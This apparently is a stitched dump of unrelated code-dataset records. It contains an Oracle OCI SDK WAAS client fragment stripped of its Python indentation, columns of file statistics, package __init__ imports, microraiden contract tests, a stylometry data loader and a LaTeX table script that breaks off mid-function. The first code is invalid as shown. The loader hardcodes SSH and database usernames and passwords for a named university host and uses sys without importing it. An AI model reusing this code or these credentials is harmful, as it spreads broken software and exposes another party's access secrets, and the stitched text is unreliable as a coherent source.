This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_waf_address_rate_limiting.py.html>`__ to see an example of how to use update_waf_address_rate_limiting API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/addressRateLimiting"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_waf_address_rate_limiting got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_waf_address_rate_limiting_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_waf_address_rate_limiting_details)
def update_waf_config(self, waas_policy_id, update_waf_config_details, **kwargs):
"""
Updates the Web Application Firewall configuration for a specified WAAS policy.
To update platform provided resources such as `GoodBots`, `ProtectionRules`, and `ThreatFeeds`,
first retrieve the list of available resources with the related list operation, such as
`GetThreatFeeds` or `GetProtectionRules`.
The returned list will contain objects with `key` properties that can be used to update the
resource during the `UpdateWafConfig` request.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.WafConfig update_waf_config_details: (required)
The new Web Application Firewall configuration to apply to a WAAS policy.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_waf_config.py.html>`__ to see an example of how to use update_waf_config API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_waf_config got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_waf_config_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_waf_config_details)
def update_whitelists(self, waas_policy_id, whitelists, **kwargs):
"""
Updates the list of IP addresses that bypass the Web Application Firewall for a WAAS policy. Supports single IP addresses, subnet masks (CIDR notation) and Address Lists.
This operation can create, delete, update, and/or reorder whitelists depending on the structure of the request body.
Whitelists can be updated by changing the properties of the whitelist object with the rule's key specified in the `key` field. Whitelists can be reordered by changing the order of the whitelists in the list of objects when updating.
Whitelists can be created by adding a new whitelist object to the list without a `key` property specified. A `key` will be generated for the new whitelist upon update.
Whitelists can be deleted by removing the existing whitelist object from the list. Any existing whitelists that are not specified with a `key` in the list of access rules will be deleted upon update.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[Whitelist] whitelists: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_whitelists.py.html>`__ to see an example of how to use update_whitelists API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/whitelists"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_whitelists got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=whitelists)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=whitelists)
| 52.8872
| 440
| 0.664875
| 47,854
| 372,273
| 4.994504
| 0.017762
| 0.057873
| 0.019096
| 0.00577
| 0.934362
| 0.921981
| 0.913747
| 0.907429
| 0.900647
| 0.88889
| 0
| 0.000916
| 0.257827
| 372,273
| 7,038
| 441
| 52.894714
| 0.86414
| 0.466821
| 0
| 0.847921
| 0
| 0
| 0.158323
| 0.031389
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018326
| false
| 0.000547
| 0.002462
| 0
| 0.057166
| 0.003556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a09da78813ff89c8d5f7ca2f4db554184b32a9c
| 221
|
py
|
Python
|
genomat/stats/__init__.py
|
Aluriak/Genomat
|
fda307949b7192018b8ab19566cb505e984d5e56
|
[
"Unlicense"
] | null | null | null |
genomat/stats/__init__.py
|
Aluriak/Genomat
|
fda307949b7192018b8ab19566cb505e984d5e56
|
[
"Unlicense"
] | null | null | null |
genomat/stats/__init__.py
|
Aluriak/Genomat
|
fda307949b7192018b8ab19566cb505e984d5e56
|
[
"Unlicense"
] | null | null | null |
import genomat.stats.stats
import genomat.stats.networks
import genomat.stats.profiles
#import genomat.stats.stats as stats
#import genomat.stats.networks as networks
#import genomat.stats.profiles as profiles
| 31.571429
| 43
| 0.800905
| 30
| 221
| 5.9
| 0.2
| 0.440678
| 0.610169
| 0.259887
| 0.689266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131222
| 221
| 6
| 44
| 36.833333
| 0.921875
| 0.547511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e14bc6a4b9f6351adf390a8b335edd5fdf93e207
| 5,948
|
py
|
Python
|
TransferLearning_AuthorshipID/data.py
|
aman7895/DeepLearningResearch
|
de7bc777f8253e164e2658e816a9c6a45f3e93e7
|
[
"MIT"
] | null | null | null |
TransferLearning_AuthorshipID/data.py
|
aman7895/DeepLearningResearch
|
de7bc777f8253e164e2658e816a9c6a45f3e93e7
|
[
"MIT"
] | null | null | null |
TransferLearning_AuthorshipID/data.py
|
aman7895/DeepLearningResearch
|
de7bc777f8253e164e2658e816a9c6a45f3e93e7
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[ ]:
#generate graphs with chunk_size, batch size
import psycopg2
import pandas as pd
import nltk
import re #This is to parse the HTML code from the given text
from sshtunnel import SSHTunnelForwarder #This is to connect to the local Database
def getCharAuthorData(authors, doc, tdoc, documentTable = 'aman_content', chunk_size = 1000):
df = pd.DataFrame()
conn = None
output = []
i = 1
#nltk.download('punkt')
try:
with SSHTunnelForwarder(("srn01.cs.cityu.edu.hk", 22),
ssh_username='stylometry',
ssh_password='stylometry',
remote_bind_address=('localhost', 5432),
local_bind_address=('localhost', 5400)):
conn = psycopg2.connect(user="stylometry", password="stylometry",
database="stylometry", host="localhost", port=5400)
cur = conn.cursor()
query = "SELECT author_id, doc_content FROM " + str(documentTable) + " WHERE author_id IN ("
flag = False
for auth in authors:
if not flag:
query = query + str(auth)
flag = True
else:
query = query + ", " + str(auth)
query = query + ") AND NOT doc_id = " + str(doc) + " AND doc_id IN ("
flag = False
for doc in tdoc:
if not flag:
query = query + str(doc)
flag = True
else:
query = query + ", " + str(doc)
query = query + ") ;"
cur.execute(query)
print(query)
print("Execution completed")
rows = cur.fetchall()
print("Read completed")
print("Number of rows: %s" % (len(rows)))
for row in rows:
#tokens = nltk.word_tokenize(row[1])
temp = re.sub('<[^<]+?>', '', row[1])
temp = temp.replace("\r\n","")
temp = temp.replace("\n","")
chars = list(temp)
chunk1 = []
for x in chars:
if (i < chunk_size):
chunk1.append(x)
i += 1
else:
chunk1.append(x)
xx = ''.join(chunk1)
xx = str(xx)
chunk1 = []
output.append([row[0], xx])
i = 1
if len(chunk1) > 0:
xx = ''.join(chunk1)
xx = str(xx)
chunk1 = []
output.append([row[0], xx])
i = 1
df = pd.DataFrame(output, columns=["author_id", "doc_content"])
print(df.dtypes)
print("Data Frame created: Shape: %s" % (str(df.shape)))
except psycopg2.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
# print df
return df
def getCharDocData(authors, doc, documentTable = 'aman_content', chunk_size = 1000):
df = pd.DataFrame()
conn = None
output = []
i = 1
#nltk.download('punkt')
try:
with SSHTunnelForwarder(("srn01.cs.cityu.edu.hk", 22),
ssh_username='stylometry',
ssh_password='stylometry',
remote_bind_address=('localhost', 5432),
local_bind_address=('localhost', 5400)):
conn = psycopg2.connect(user="stylometry", password="stylometry",
database="stylometry", host="localhost", port=5400)
cur = conn.cursor()
query = "SELECT author_id, doc_content FROM " + str(documentTable) + " WHERE"
query += " doc_id = '" + str(doc) + "' ;"
cur.execute(query)
print("Execution completed")
rows = cur.fetchall()
print("Read completed")
print("Number of rows: %s" % (len(rows)))
for row in rows:
#tokens = nltk.word_tokenize(row[1])
temp = re.sub('<[^<]+?>', '', row[1])
temp = temp.replace("\r\n","")
temp = temp.replace("\n","")
chars = list(temp)
chunk1 = []
for x in chars:
if (i < chunk_size):
chunk1.append(x)
i += 1
else:
chunk1.append(x)
xx = ''.join(chunk1)
xx = str(xx)
chunk1 = []
output.append([row[0], xx])
i = 1
if len(chunk1) > 0:
xx = ''.join(chunk1)
xx = str(xx)
chunk1 = []
output.append([row[0], xx])
i = 1
df = pd.DataFrame(output, columns=["author_id", "doc_content"])
print(df.dtypes)
print("Data Frame created: Shape: %s" % (str(df.shape)))
except psycopg2.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
# print df
return df
# In[ ]:
'''
authors=[123, 80, 75]
doc = 204
df = getCharAuthorData(authors, doc, documentTable = 'aman_content', chunk_size = 1000)
'''
| 32.326087
| 104
| 0.421822
| 560
| 5,948
| 4.417857
| 0.241071
| 0.006467
| 0.021019
| 0.029103
| 0.826597
| 0.813662
| 0.775667
| 0.775667
| 0.752627
| 0.752627
| 0
| 0.030103
| 0.463853
| 5,948
| 183
| 105
| 32.502732
| 0.745688
| 0.049092
| 0
| 0.857143
| 1
| 0
| 0.111897
| 0.007617
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015038
| false
| 0.030075
| 0.037594
| 0
| 0.067669
| 0.097744
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e16688f8fea4c7921401b7718654817095487056
| 360
|
py
|
Python
|
networkx/linalg/__init__.py
|
Tscheik/networkx
|
19a8d540afac21eced23cf06a47f496f164039e9
|
[
"BSD-3-Clause"
] | 1
|
2018-08-09T14:29:43.000Z
|
2018-08-09T14:29:43.000Z
|
networkx/linalg/__init__.py
|
Tscheik/networkx
|
19a8d540afac21eced23cf06a47f496f164039e9
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/linalg/__init__.py
|
Tscheik/networkx
|
19a8d540afac21eced23cf06a47f496f164039e9
|
[
"BSD-3-Clause"
] | null | null | null |
from networkx.linalg.attrmatrix import *
import networkx.linalg.attrmatrix
from networkx.linalg.spectrum import *
import networkx.linalg.spectrum
from networkx.linalg.graphmatrix import *
import networkx.linalg.graphmatrix
from networkx.linalg.laplacianmatrix import *
import networkx.linalg.laplacianmatrix
from networkx.linalg.algebraicconnectivity import *
| 36
| 51
| 0.858333
| 41
| 360
| 7.536585
| 0.219512
| 0.407767
| 0.291262
| 0.33657
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077778
| 360
| 9
| 52
| 40
| 0.930723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e1b61b5be0c0a54ea11d84d31c075649bdda1be0
| 33
|
py
|
Python
|
src/vaulter_py/__init__.py
|
Shreejan-35/VAULTERPY
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | 2
|
2022-03-27T21:56:18.000Z
|
2022-03-30T09:06:29.000Z
|
src/vaulter_py/__init__.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
src/vaulter_py/__init__.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
from .passvault import Passvault
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e1c5c2e15a0c102fb655c54f8954d23780fbad38
| 5,059
|
py
|
Python
|
contracts/tests/test_channel_delegate.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 417
|
2017-09-19T19:06:23.000Z
|
2021-11-28T05:39:23.000Z
|
contracts/tests/test_channel_delegate.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 259
|
2017-09-19T20:42:57.000Z
|
2020-11-18T01:31:41.000Z
|
contracts/tests/test_channel_delegate.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 126
|
2017-09-19T17:11:39.000Z
|
2020-12-17T17:05:27.000Z
|
import pytest
from ethereum import tester
def test_channel_erc223_create_delegate(
owner,
get_accounts,
uraiden_instance,
token_instance,
delegate_instance,
get_block):
(sender, receiver) = get_accounts(2)
deposit = 1000
txdata = bytes.fromhex(sender[2:] + receiver[2:])
# Delegate contract is a trusted contract
assert uraiden_instance.call().trusted_contracts(delegate_instance.address)
# Fund delegate contract with tokens
token_instance.transact({"from": owner}).transfer(delegate_instance.address, deposit + 100)
# Create channel through delegate
txn_hash = delegate_instance.transact({"from": sender}).createChannelERC223(deposit, txdata)
# Make sure the channel was created between sender and receiver
open_block_number = get_block(txn_hash)
channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
assert channel_data[0] == uraiden_instance.call().getKey(
sender,
receiver,
open_block_number
)
assert channel_data[1] == deposit
assert channel_data[2] == 0
assert channel_data[3] == 0
def test_channel_erc20_create_delegate(
owner,
get_accounts,
uraiden_instance,
token_instance,
delegate_instance,
get_block):
(sender, receiver) = get_accounts(2)
deposit = 1000
# Delegate contract is a trusted contract
assert uraiden_instance.call().trusted_contracts(delegate_instance.address)
# Fund delegate with tokens
token_instance.transact({"from": owner}).transfer(delegate_instance.address, deposit + 100)
# Create channel through delegate
txn_hash = delegate_instance.transact(
{"from": sender}
).createChannelERC20(sender, receiver, deposit)
# Make sure the channel was created between sender and receiver
open_block_number = get_block(txn_hash)
channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
assert channel_data[0] == uraiden_instance.call().getKey(
sender,
receiver,
open_block_number
)
assert channel_data[1] == deposit
assert channel_data[2] == 0
assert channel_data[3] == 0
def test_channel_erc223_topup_delegate(
owner,
uraiden_instance,
token_instance,
delegate_instance,
get_channel
):
deposit = 1000
deposit_topup = 200
(sender, receiver, open_block_number) = get_channel(
uraiden_instance,
token_instance,
deposit
)[:3]
txdata = sender[2:] + receiver[2:] + hex(open_block_number)[2:].zfill(8)
txdata = bytes.fromhex(txdata)
# Delegate contract is a trusted contract
assert uraiden_instance.call().trusted_contracts(delegate_instance.address)
# Fund delegate with tokens
token_instance.transact(
{"from": owner}
).transfer(delegate_instance.address, deposit_topup + 100)
# Top up channel through delegate
delegate_instance.transact({"from": sender}).topUpERC223(deposit_topup, txdata)
# Check channel deposit
channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
assert channel_data[1] == deposit + deposit_topup
def test_channel_erc20_topup_delegate(
owner,
uraiden_instance,
token_instance,
delegate_instance,
get_channel
):
deposit = 1000
deposit_topup = 200
(sender, receiver, open_block_number) = get_channel(
uraiden_instance,
token_instance,
deposit
)[:3]
# Delegate contract is a trusted contract
assert uraiden_instance.call().trusted_contracts(delegate_instance.address)
# Fund delegate with tokens
token_instance.transact({"from": owner}).transfer(delegate_instance.address, deposit_topup)
# Top up channel through delegate
delegate_instance.transact({"from": sender}).topUpERC20(
sender,
receiver,
open_block_number,
deposit_topup
)
# Check channel deposit
channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
assert channel_data[1] == deposit + deposit_topup
def test_delegate_remove_trusted_contract(
owner,
get_accounts,
uraiden_instance,
token_instance,
delegate_instance):
(sender, receiver) = get_accounts(2)
deposit = 1000
# Fund delegate with tokens
token_instance.transact({"from": owner}).transfer(delegate_instance.address, deposit * 3)
# Create channel through delegate
delegate_instance.transact({"from": sender}).createChannelERC20(sender, receiver, deposit)
# Remove trusted contract
uraiden_instance.transact({"from": owner}).removeTrustedContracts([
delegate_instance.address
])
# Delegate create channel should fail now
with pytest.raises(tester.TransactionFailed):
delegate_instance.transact({"from": sender}).createChannelERC20(sender, receiver, deposit)
| 31.228395
| 98
| 0.699545
| 562
| 5,059
| 6.049822
| 0.13879
| 0.098824
| 0.070588
| 0.074412
| 0.857353
| 0.848824
| 0.848824
| 0.837941
| 0.831471
| 0.759412
| 0
| 0.0214
| 0.214865
| 5,059
| 161
| 99
| 31.42236
| 0.834592
| 0.136391
| 0
| 0.720721
| 0
| 0
| 0.01104
| 0
| 0
| 0
| 0
| 0
| 0.126126
| 1
| 0.045045
| false
| 0
| 0.018018
| 0
| 0.063063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
becf06596a00df56f753962b24ed1f5eafd162d0
| 6,603
|
py
|
Python
|
benchmarks/tables/mix-files.py
|
vsahil/influence-duplicate
|
ae5bc77be6dcb7d69054a520733c373d833552da
|
[
"MIT"
] | null | null | null |
benchmarks/tables/mix-files.py
|
vsahil/influence-duplicate
|
ae5bc77be6dcb7d69054a520733c373d833552da
|
[
"MIT"
] | null | null | null |
benchmarks/tables/mix-files.py
|
vsahil/influence-duplicate
|
ae5bc77be6dcb7d69054a520733c373d833552da
|
[
"MIT"
] | 1
|
2021-11-03T06:53:18.000Z
|
2021-11-03T06:53:18.000Z
|
import sys, os
def min_discm_mix(scientific_notation):
print(scientific_notation)
if scientific_notation:
file1 = "min-discm_scientific.tex"
else:
file1 = "min-discm_floating.tex"
with open(file1, "r") as f1:
content_min_discm = f1.readlines()
with open("test_accuracy_for_min_discm.tex", "r") as f2:
content_max_accuracy = f2.readlines()
with open("parity-diff-min-discm_fulltest.tex", "r") as f3:
content_parity = f3.readlines()
if scientific_notation:
write_file = "min-discm-model_scientific.tex"
else:
write_file = "min-discm-model_floating.tex"
if os.path.exists(f"{write_file}"):
os.system(f"rm {write_file}")
for id_, (l1, l2, l3) in enumerate(zip(content_min_discm, content_max_accuracy, content_parity)):
l1 = l1.replace(" \\\\ \n", "") # remove the breaklines
l1 = l1.replace(" \\\\ \\midrule\n", "")
l1 = l1.replace("\\\\", "") # remove the breaklines, for the last average line
l2 = l2.replace(" \\\\ \n", "") # new
l2 = l2.replace(" \\\\ \\midrule\n", "")
l2 = l2.replace("\\\\", "")
if "midrule" in l1:
assert "midrule" in l2 and "midrule" in l3
mix = '\\midrule\n'
else:
# l1 = l1.split("&")
experiment1 = l1.split("&")[0].strip()
try:
l1 = l1[l1.index("&"):] # remove experiment ID
except:
import ipdb; ipdb.set_trace()
# l2 = l2.split("&")
experiment2 = l2.split("&")[0].strip()
l2 = l2[l2.index("&"):] # remove experiment ID
experiment3 = l3.split("&")[0].strip() # new
l3 = l3[l3.index("&"):]
try:
assert(experiment1 == experiment2 == experiment3)
except:
import ipdb; ipdb.set_trace()
mix = experiment1 + " " + l1 + l2 + l3 # this already has the breaklines
# print(mix)
with open(write_file, "a") as f3:
print(mix, end="", file=f3)
def max_accuracy_mix(scientific_notation):
print(scientific_notation)
if scientific_notation:
file1 = "discm_for_max_accuracy_scientific.tex"
else:
file1 = "discm_for_max_accuracy_floating.tex"
with open(file1, "r") as f1:
content_min_discm = f1.readlines()
with open("max-test-accuracy.tex", "r") as f2:
content_max_accuracy = f2.readlines()
with open("parity-diff-max-accuracy_fulltest.tex", "r") as f3:
content_parity = f3.readlines()
if scientific_notation:
write_file = "max-accuracy-model_scientific.tex"
else:
write_file = "max-accuracy-model_floating.tex"
if os.path.exists(f"{write_file}"):
os.system(f"rm {write_file}")
for id_, (l1, l2, l3) in enumerate(zip(content_min_discm, content_max_accuracy, content_parity)):
l1 = l1.replace(" \\\\ \n", "") # remove the breaklines
l1 = l1.replace(" \\\\ \\midrule\n", "")
l1 = l1.replace("\\\\", "") # remove the breaklines, for the last average line
l2 = l2.replace(" \\\\ \n", "") # new
l2 = l2.replace(" \\\\ \\midrule\n", "")
l2 = l2.replace("\\\\", "")
if "midrule" in l1:
assert "midrule" in l2 and "midrule" in l3
mix = '\\midrule\n'
else:
# l1 = l1.split("&")
experiment1 = l1.split("&")[0].strip()
try:
l1 = l1[l1.index("&"):] # remove experiment ID
except:
import ipdb; ipdb.set_trace()
# l2 = l2.split("&")
experiment2 = l2.split("&")[0].strip()
l2 = l2[l2.index("&"):] # remove experiment ID
experiment3 = l3.split("&")[0].strip() # new
l3 = l3[l3.index("&"):]
try:
assert(experiment1 == experiment2 == experiment3)
except:
import ipdb; ipdb.set_trace()
mix = experiment1 + " " + l1 + l2 + l3 # this already has the breaklines
# print(mix)
with open(write_file, "a") as f3:
print(mix, end="", file=f3)
def min_parity_mix(scientific_notation):
print(scientific_notation)
if scientific_notation:
file1 = "discm_for_min_parity_scientific.tex"
else:
file1 = "discm_for_min_parity_floating.tex"
with open(file1, "r") as f1:
